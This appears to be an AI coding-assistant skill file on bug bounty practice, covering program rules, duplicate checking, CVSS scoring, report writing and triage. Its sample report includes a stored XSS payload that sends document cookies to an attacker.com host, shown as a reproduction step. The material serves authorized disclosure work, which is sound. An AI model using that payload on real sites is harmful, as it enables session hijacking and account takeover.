---
name: pentest-bugbounty
description: Bug bounty methodology advisory (HackerOne/Bugcrowd/Intigriti) covering deduplication, report writing, severity scoring and payout maximization. Triggers on bug bounty, HackerOne, Bugcrowd, Intigriti, H1, BB, dedup, severity, CVSS scoring, bug report writing, triage.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Bash Grep
metadata:
  author: badi
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents bug-bounty
---

# pentest-bugbounty

Bug bounty hunting discipline: authorized programs only, adherence to the rules of engagement (ROE), deduplication, high-quality reports.

## Triggers

- "let's write an H1 report"
- "Bugcrowd submission"
- "calculate the CVSS score"
- "how do I dedup"
- "bounty report template"

## Program Selection Criteria

| Factor | Effect |
|--------|------|
| Scope breadth (*.target.com vs a single app) | Attack surface |
| Bounty range (min-max) | ROI |
| Response SLA (in days) | Patience required |
| Disclosure policy (public/private) | Portfolio growth |
| Safe Harbor (legal protection) | Risk |
| Researcher rating required (private programs) | Accessibility |

**Recommended progression**: VDP (vulnerability disclosure program) -> public bounty -> private invitation.

## Don'ts (Program Violations)

- Testing out-of-scope assets (always a ban, plus legal risk)
- Exfiltrating production data beyond the proof threshold (the minimum needed to show impact)
- Automated scanning without the vendor's approval
- DoS / load testing
- Social engineering employees (usually prohibited)
- Brute force (usually prohibited)
- Public disclosure before the program owner's approval

## Dedup Strategy

Before submitting, search the program's disclosed reports for the same weakness on the same endpoint:

```bash
# H1 hacktivity: https://hackerone.com/<program>/hacktivity is a JavaScript-rendered page,
# so `curl | jq` on it fails (the body is HTML, not JSON). Search it in the browser, or use
# the HackerOne Hacker API (token required; check the current docs for the hacktivity
# endpoint and response shape) and filter the JSON it returns. The jq filter below walks
# any object tree, so it does not depend on the exact shape:
curl -s -u '<username>:<api-token>' '<hacker-api-hacktivity-endpoint>' \
  | jq '.. | objects | select(has("title")) | select(.title | test("<finding-keyword>"; "i")) | .title'

# Bugcrowd: no public JSON feed; search the disclosed submissions on the program page.
```

If the same vulnerability type on the same endpoint already appears, the duplicate risk is **high**: try another program, or find a different endpoint or vector. Hacktivity only shows disclosed reports, so a pending, undisclosed report on the same issue stays invisible to you; the search lowers duplicate risk but cannot remove it, so submit promptly and mention the search you did in the report.
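The type-plus-endpoint rule above, as an added example that is not part of this skill and calls no HackerOne or Bugcrowd API: it normalizes endpoints (ids collapsed, query string dropped), classifies titles by keyword, and grades duplicate risk against a constructed list shaped like a hacktivity search export. `DISCLOSED`, `classify`, `normalize_endpoint` and `duplicate_risk` are all names chosen here.

```python
"""Pre-submission duplicate-risk check: same weakness class on the same
normalized endpoint. Added example; not part of this skill and not an
official HackerOne/Bugcrowd API. DISCLOSED is a constructed sample."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Keyword -> canonical weakness class; first match wins, so put the most
# specific classes first if you extend this.
WEAKNESS_KEYWORDS = {
    "xss": ("xss", "cross-site scripting", "cross site scripting"),
    "sqli": ("sql injection", "sqli"),
    "idor": ("idor", "insecure direct object"),
    "ssrf": ("ssrf", "server-side request forgery"),
    "open_redirect": ("open redirect",),
}
# Path segments that are object identifiers (numeric or UUID) collapse to {id},
# so /users/123 and /users/999 are the same endpoint for dedup purposes.
ID_SEGMENT = re.compile(
    r"^(\d+|[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$", re.I
)


def classify(title: str) -> str:
    """Map a report title to a weakness class, or 'other'."""
    t = title.lower()
    for cls, keywords in WEAKNESS_KEYWORDS.items():
        if any(k in t for k in keywords):
            return cls
    return "other"


def normalize_endpoint(url: str) -> str:
    """'host/path' with ids collapsed; scheme, port, query and fragment dropped.
    urlsplit already lower-cases the hostname; path segments are lower-cased too."""
    parts = urlsplit(url if "://" in url else "https://" + url)
    segs = []
    for seg in parts.path.split("/"):
        if not seg:
            continue
        segs.append("{id}" if ID_SEGMENT.match(seg) else seg.lower())
    return (parts.hostname or "") + "/" + "/".join(segs)


def duplicate_risk(candidate: Dict, disclosed: List[Dict]) -> Tuple[str, List[int]]:
    """'high'   = same class on the same endpoint (expect a duplicate)
    'medium' = same class elsewhere on the same host (look closer first)
    'low'    = nothing similar disclosed. Returns the matching report ids."""
    cls = classify(candidate["title"])
    ep = normalize_endpoint(candidate["url"])
    host = ep.split("/", 1)[0]
    same_class = [r for r in disclosed if classify(r["title"]) == cls]
    exact = [r["id"] for r in same_class if normalize_endpoint(r["url"]) == ep]
    if exact:
        return "high", exact
    same_host = [
        r["id"] for r in same_class
        if normalize_endpoint(r["url"]).split("/", 1)[0] == host
    ]
    if same_host:
        return "medium", same_host
    return "low", []


# Constructed sample in the shape of a disclosed-report export; not real reports.
DISCLOSED = [
    {"id": 1, "title": "Stored XSS in comment body on app.example.com",
     "url": "https://app.example.com/comments"},
    {"id": 2, "title": "IDOR on /api/users/12345/profile exposes email",
     "url": "https://api.example.com/api/users/12345/profile"},
    {"id": 3, "title": "Reflected XSS in search parameter",
     "url": "https://app.example.com/search?q=test"},
]

if __name__ == "__main__":
    cand = {"title": "Stored XSS via comment field",
            "url": "https://APP.example.com/comments/?page=2"}
    print(duplicate_risk(cand, DISCLOSED))  # ('high', [1])
```

The host-only match is deliberately graded medium rather than ignored: a disclosed reflected XSS on the same host often means the program has already hardened that template, and the triager will compare the two before paying.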

## CVSS 3.1 Quick Calculation

```
ISS = 1 - (1 - C) * (1 - I) * (1 - A)

Impact         = 6.42 * ISS                                      (Scope Unchanged)
               = 7.52 * (ISS - 0.029) - 3.25 * (ISS - 0.02)^15   (Scope Changed)
Exploitability = 8.22 * AV * AC * PR * UI

Base = 0                                                  if Impact <= 0
     = Roundup(min(Impact + Exploitability, 10))          (Scope Unchanged)
     = Roundup(min(1.08 * (Impact + Exploitability), 10)) (Scope Changed)
Roundup = round UP to one decimal place (8.71 -> 8.8)

Impact metrics (C/I/A): None=0, Low=0.22, High=0.56

Exploitability metrics:
  AV: Network=0.85, Adjacent=0.62, Local=0.55, Physical=0.2
  AC: Low=0.77, High=0.44
  PR: None=0.85, Low=0.62 (0.68 if Scope Changed), High=0.27 (0.50 if Scope Changed)
  UI: None=0.85, Required=0.62

Rating: 0 None | 0.1-3.9 Low | 4.0-6.9 Medium | 7.0-8.9 High | 9.0-10.0 Critical
```

Web exploit examples:
- SQLi (authenticated, network, low complexity, low privilege, no UI, high CIA)
  - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = **8.8 (HIGH)**
- Stored XSS that fires in an admin's browser (the victim is a different user, so Scope Changed; the admin must open the page, so UI:R; full admin takeover, so high CIA)
  - AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H = **9.0 (CRITICAL)**
  - With A:N the same vector scores **8.7 (HIGH)**: the availability metric alone decides whether this finding crosses the Critical line, so justify it (account lockout, data deletion) in the Impact section rather than asserting it.

## Rapor Sablonu (H1 / Bugcrowd ortak)

```markdown
## Title
[CRITICAL] Stored XSS in admin panel allows session hijack of all admins

## Severity
CVSS 3.1: 9.0 (CRITICAL)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

## Summary
Authenticated low-priv user can inject JS into the comment field that
executes in admin browser when viewing dashboard. Session token is
exfiltrated to attacker-controlled domain.

## Steps to Reproduce
1. Login as low-privilege user (user@example.com / Test123!)
2. Navigate to /comments
3. Submit comment body: `<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">`
4. As admin (your own test admin account or one provided by the program, never a real admin's session), navigate to /admin/comments
5. Observe outbound request to attacker.com containing admin session cookie

## Impact
- Full admin compromise (session hijack)
- Persistent payload (stored DB)
- 1-click via existing admin workflow (no extra interaction)

## Proof of Concept
[screenshot1.png] — comment submission
[screenshot2.png] — admin browser request
[burp-export.har] — full HAR file

## Suggested Fix
- Output-encode the comment body at render time; if rich text must be stored, also sanitize server-side on save with an allowlist sanitizer (e.g. DOMPurify via jsdom)
- CSP: `default-src 'self'; img-src 'self' data:` (blocks both the inline `onerror` handler and the exfil `fetch`)
- Cookie: `HttpOnly` + `Secure` + `SameSite=Strict`

## Additional Context
- Affected version: 4.2.1 (production as of 2026-05-15)
- Tested on: Chrome 119, Firefox 120
- No public PoC, no CVE assigned
```

## Preparing for Triage Pushback

Questions the triager may come back with after you submit:

| Question | Be ready with |
|------|-----------------|
| "We can't reproduce it" | A video recording; exact browser, OS and versions; the HAR export |
| "That's expected behavior, input there isn't restricted" | A demonstration of real impact (admin session hijack), not just the injection |
| "Duplicate, researcher N already submitted it" | The distinct endpoint or vector you are claiming, plus the dedup search you did before submitting |
| "We'd rate this as self-XSS" | Proof of cross-user effect (a second account or role triggers the payload) |

## Bounty Maximization

- **Chain bugs**: Low + Low + Medium chained into a Critical pays a premium; report the chain as one submission with the end-to-end impact
- **Out-of-band proof**: a DNS callback, email or time-based PoC for blind bugs turns a hard-to-reproduce finding into one triage can verify on its own
- **Detection bypass**: evidence that the payload passes the WAF / CSP in place strengthens the impact claim
- **Multi-domain impact**: if more than one asset is affected, list each one explicitly

## Out-of-Scope

- Building an automated dedup tool (the dedup decision stays with a human)
- Social engineering employees
- Prohibited techniques (DoS, brute force)
